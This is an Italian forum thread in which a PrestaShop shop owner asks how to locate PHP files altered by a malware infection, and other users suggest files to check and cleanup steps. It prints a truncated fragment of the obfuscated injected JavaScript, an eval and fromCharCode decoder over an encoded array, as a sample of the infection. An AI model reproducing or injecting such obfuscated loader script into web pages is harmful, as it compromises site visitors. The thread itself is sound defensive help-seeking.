Malware , trovare file corrotti

[maverik]

Avevo gia' avuto un problema l'anno scorso , ora mi si e' ripresentato di nuovo .... google webmaster mi ha inviato il report con i codici infetti prelevati dalla pagina web , ma non riesco ad arrivare ai file modificati.

Conoscete qualche tools per arrivare direttamente al file php modificato per poterlo ripristinare ..... o in alternativa in questi casi come vi comportate ?

<script>aa=([].slice+'vr3').substr(1,4);if((aa=="func")||(aa
=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'e
vweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ww=wind
ow;ss=new String();s=String;12-function(){e=ww.eval;f='fromC
harCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()
-2);h=-1*(ddd-d2);n=["4.5k"+"4.5k"+"52.5k"+"51k"+"16k"+"20k"

+"50k"+"55.5k"+"49.5k"+"58.5k"+"54.5k"+"50.5k"+"55k"+"58k"+"
ESEMPIO DI CODICE INFETTO

4.5k"+"4.5k"+"50k"+"55.5k"+"49.5k"+"58.5k"+"54.5k"+"50.5k"+"
55k"+"58k"+"23k"+"59.5k"+"57k"+"52.5k"+"58k"+"50.5k"+"20k"+"
17k"+"30k"+"52.5k"+"51k"+"57k"+"48.5k"+"54.5k"+"50.5k"+"16k"
+"57

[Carl Favre]

Hello maverik,

 

quali file sono stati infettati? Quale versione di PrestaShop oggi utilizza?

[maverik]

Ciao Carl , uso la 1.3.1 su un sito produttivo.

Il problema e' proprio trovare quale sia il file php infetto , perchè Google mi fornisce solo il link delle pagine hanno problemi.

http://www.bolognesi.net/negozio/category.php?id_category=52&orderby=price&orderway=desc&id_lang=1

[Carl Favre]

Ci scusiamo per la traduzione di Google.

 

Avete un her.php file su file di download / upload PrestaShop?

 

È il piè di pagina del file del codice tema strano?

[maverik]

Grazie Carl , no nelle cartelle Download e Upload non ho nessun file her.php

La cosa che mi incuriosisce è che le pagine che google vede come infette hanno tutte nell' indirizzo la scelta di ordinamento sezionata (sort by ....)

/negozio/category.php?id_category=52&orderby=price&orderway=desc&id_lang=1 - Dettagli  08/01/12
/negozio/category.php?id_category=8&n=10&orderby=position&orderway=desc&id_lang=3 - Dettagli  08/01/12
/negozio/category.php?n=10&orderby=name&orderway=asc&id_lang=3&id_category=32 - Dettagli  08/01/12
/negozio/category.php?n=10&orderby=price&orderway=desc&id_category=20 - Dettagli  08/01/12
/negozio/category.php?n=50&orderby=position&orderway=desc&id_category=40 - Dettagli  08/01/12
/negozio/category.php?n=50&orderby=quantity&orderway=desc&p=3&id_category=45&id_lang=3 - Dettagli  08/01/12
/negozio/manufacturer.php?id_manufacturer=37&n=20&orderby=position&orderway=desc&id_lang=1 - Dettagli  08/01/12
/negozio/manufacturer.php?n=10&orderby=price&orderway=asc&id_manufacturer=29&id_lang=1 - Dettagli  08/01/12
/negozio/search.php?tag=moly&orderby=price&orderway=asc&id_lang=1 - Dettagli

[Carl Favre]

Controlla tutti i file index.php e footer.php e vedere se non si ha lo stesso codice. Passa anche il virus e modificare il tuo accesso FTP.

[maverik]

Ho trovato due file infetti in :

 

modules/blockfooterdata/blockfooterdata.php

modules/statshome/statshome.php

 

.... spero che non ce ne siano altri

Ma non esiste un tool a cui dare in pasto tutto il sito e che trovi i file infetti?

Per trovare questi mi sono passato a manina tutti i file dei moduli .

[gluca]

maverik che software hai utilizzato per trovare i file infetti?

grazie